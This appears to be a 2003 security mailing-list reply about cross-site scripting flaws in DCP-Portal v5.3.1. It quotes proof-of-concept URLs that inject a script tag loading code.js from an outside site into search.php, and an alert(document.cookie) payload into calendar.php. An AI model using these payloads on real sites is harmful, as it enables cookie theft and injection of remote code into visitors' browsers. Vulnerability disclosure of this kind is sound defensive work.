On Wed, 19 Mar 2003 01:59:35 +0200 Ertan Kurt <[EMAIL PROTECTED]> wrote:
> DCP-Portal v5.3.1 > http://target/search.php?fields=content&q=<script%20src=http://othersite/code.js></script> > http://target/calendar.php?year=<script>alert(document.cookie);</script>&month=03&day=05 > Vendor Site: http://www.dcp-portal.org I've found many more vulnerabilities in dcp-portal... look at attached advisory. Regards Grzegorz Aksamit ---------------------------------------------------------- ( signature censored ) ---------------------------------[ grzegorz aksamit ]-----
dcp-advisory-06-02-2003.txt
Description: Binary data
